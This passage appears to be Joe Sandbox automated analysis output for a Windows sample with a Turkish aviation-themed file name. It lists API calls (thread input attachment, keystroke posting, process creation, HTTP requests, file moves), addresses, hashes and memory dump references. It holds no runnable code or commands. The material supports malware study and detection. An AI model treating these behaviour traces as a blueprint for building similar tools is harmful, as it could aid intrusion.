                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                    • Opcode ID: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                                                                                    • Instruction ID: 6c67cc9efbb5526c374b58321db88cf62953f8bf1af7e60aca7260a4531dc07b
                                                                                                                                    • Opcode Fuzzy Hash: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                                                                                    • Instruction Fuzzy Hash: FA11A73B64C30BB9EB252525DC0BFB737ACDF15770B20002AFE00E54B5EEA659517694
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 010188D7
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 01018904
                                                                                                                                    • CoUninitialize.OLE32 ref: 0101890E
                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01018A0E
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01018B3B
                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01032C0C), ref: 01018B6F
                                                                                                                                    • CoGetObject.OLE32(?,00000000,01032C0C,?), ref: 01018B92
                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 01018BA5
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01018C25
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 01018C35
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                    • Opcode ID: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                                                                                    • Instruction ID: dcad1cdb61a8e734f9c5dfef949c68b352b2a8870247f05aefe87752098f4e2a
                                                                                                                                    • Opcode Fuzzy Hash: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                                                                                    • Instruction Fuzzy Hash: 56C136B1208305AFD700DF68C88492BBBE9FF89748F04895DF9899B251DB75EE05CB52
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01007A6C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1725837607-0
                                                                                                                                    • Opcode ID: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                                                                                    • Instruction ID: d9e0c736ed0faa9c38062661b151cba33affd7a40e7c8ce02a6eafad0a748775
                                                                                                                                    • Opcode Fuzzy Hash: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                                                                                    • Instruction Fuzzy Hash: 67B1627190020A9FEB12DF98C885BBEBBF4FF49321F144469E6C1E7281D779A941CB91
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 010011F0
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01000268,?,00000001), ref: 01001204
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0100120B
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 0100121A
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100122C
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001245
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001257
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 0100129C
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012B1
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                                                                                    • Instruction ID: 7cfe4f23110d39a0eb38d3baf1abb0c7747d4fe531bf5aa4d56806c6d1d956bd
                                                                                                                                    • Opcode Fuzzy Hash: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                                                                                    • Instruction Fuzzy Hash: DB31CEB5600204BBFB329F68D988FA93BFDEB58351F214155F980C61DAD77AD9408B60
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FAFAA6
                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00FAFB45
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00FAFC9C
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00FE45D6
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FE463B
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE4668
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                    • Opcode ID: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                                                                                    • Instruction ID: ddcf3b1f50a67b3f0fac59644f2890aadbef0ec4b3f37e1fbc2bff158c06c182
                                                                                                                                    • Opcode Fuzzy Hash: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                                                                                    • Instruction Fuzzy Hash: C5A18F71701212CFCB29EF55C994B69F364BF06760F5442ADE80AAB261CB34ED16EF50
                                                                                                                                    APIs
                                                                                                                                    • EnumChildWindows.USER32(?,00FFA439), ref: 00FFA377
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                                    • Opcode ID: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                                                                                    • Instruction ID: ca9141afbb1ac5e68058d1e1bb2830ca266b0740c8a95c3b3e20d23e96058db5
                                                                                                                                    • Opcode Fuzzy Hash: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                                                                                    • Instruction Fuzzy Hash: 1291B7B1A0060ADACB08EF60C842BFEFB74BF04350F548119D95DA7261DF356959FBA1
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FA2EAE
                                                                                                                                      • Part of subcall function 00FA1DB3: GetClientRect.USER32(?,?), ref: 00FA1DDC
                                                                                                                                      • Part of subcall function 00FA1DB3: GetWindowRect.USER32(?,?), ref: 00FA1E1D
                                                                                                                                      • Part of subcall function 00FA1DB3: ScreenToClient.USER32(?,?), ref: 00FA1E45
                                                                                                                                    • GetDC.USER32 ref: 00FDCD32
                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FDCD45
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FDCD53
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FDCD68
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FDCD70
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FDCDFB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                    • String ID: U
                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                    • Opcode ID: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                                                                                    • Instruction ID: 2a0467de679854fee67b6ee4bc812221f5df14b0dbe190016389e5346b60ffe2
                                                                                                                                    • Opcode Fuzzy Hash: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                                                                                    • Instruction Fuzzy Hash: 9571A471900206DFCF319F64CC84AAA7BB7FF49360F18426BED955A255C7359C81EB90
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01011A50
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01011A7C
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01011ABE
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01011AD3
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011AE0
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01011B10
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 01011B57
                                                                                                                                      • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                                                                                      • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                                    • Opcode ID: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                                                                                    • Instruction ID: 55d240b1ef48634011a2a71b536a80d20b0c882d7d18e5df5d99e9ea534ccb3e
                                                                                                                                    • Opcode Fuzzy Hash: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                                                                                    • Instruction Fuzzy Hash: C641A3B1500209BFEB168F64CC89FFF7BACFF08354F104156FA859A149E7799A408BA0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0102F910), ref: 01018D28
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0102F910), ref: 01018D5C
                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01018ED6
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 01018F00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 560350794-0
                                                                                                                                    • Opcode ID: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                                                                                    • Instruction ID: 951e26c988f57dcba0c5b82ce2c07a59ea470626dbf83ab8655fad7348dd33b5
                                                                                                                                    • Opcode Fuzzy Hash: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                                                                                    • Instruction Fuzzy Hash: 7FF18A71A00209EFDF14DF98C884EAEBBB9FF49314F108099FA45AB255DB75AE41CB50
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0101F6B5
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F848
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F86C
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8AC
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8CE
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101FA4A
                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0101FA7C
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101FAAB
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0101FB22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4090791747-0
                                                                                                                                    • Opcode ID: 3ba64a103cfbdd64140d5a29a78f9508aaae76639c0a07a3d18fcc18ca6e9d9c
                                                                                                                                    • Instruction ID: 686f18b159859a860dba05d8dd8fc2f1f06df0ad8caae30a9a07b3245834ae2a
                                                                                                                                    • Opcode Fuzzy Hash: 3ba64a103cfbdd64140d5a29a78f9508aaae76639c0a07a3d18fcc18ca6e9d9c
                                                                                                                                    • Instruction Fuzzy Hash: 89E1CF712043029FD714EF28C881B6ABBE1BF85354F18856DF8C58B2A6CB39EC45DB52
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                                                                                      • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 01004D40
                                                                                                                                    • _wcscmp.LIBCMT ref: 01004D5A
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 01004D75
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 793581249-0
                                                                                                                                    • Opcode ID: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                                                                                    • Instruction ID: ae10e55bccebd5a789f22f8fa80e5170580d37b7132517fb60b3389eabc2f59f
                                                                                                                                    • Opcode Fuzzy Hash: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                                                                                    • Instruction Fuzzy Hash: EE5151B20083459BD765EBA4DC81DDF77ECAF85350F00092EA2C5D3191EE75A288C76A
                                                                                                                                    APIs
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010286FF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                    • Opcode ID: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                                                                                    • Instruction ID: df39795b0103bf5f8ea810f1874bfab92f9312c9df67d6be4f3165214336bc30
                                                                                                                                    • Opcode Fuzzy Hash: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                                                                                    • Instruction Fuzzy Hash: 6251B538600265BEEB709E28DC89FAD3BE4FB09750F208157FAD0E61A1D77AE550CB50
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FDC2F7
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FDC319
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FDC331
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FDC34F
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FDC370
                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 00FDC37F
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FDC39C
                                                                                                                                    • DestroyIcon.USER32(?), ref: 00FDC3AB
                                                                                                                                      • Part of subcall function 0102A4AF: DeleteObject.GDI32(00000000), ref: 0102A4E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2819616528-0
                                                                                                                                    • Opcode ID: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                                                                                    • Instruction ID: a561a58bd1af71229d540d1875066c35c682b30b2eb3d2713661b0c83f0587f3
                                                                                                                                    • Opcode Fuzzy Hash: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                                                                                    • Instruction Fuzzy Hash: 76518CB1A00206AFDB24DF28CC45FAA37B5FB59360F104529F942D7290DB75ED50EBA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFA84C
                                                                                                                                      • Part of subcall function 00FFA82C: GetCurrentThreadId.KERNEL32 ref: 00FFA853
                                                                                                                                      • Part of subcall function 00FFA82C: AttachThreadInput.USER32(00000000,?,00FF9683,?,00000001), ref: 00FFA85A
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF968E
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FF96AB
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FF96AE
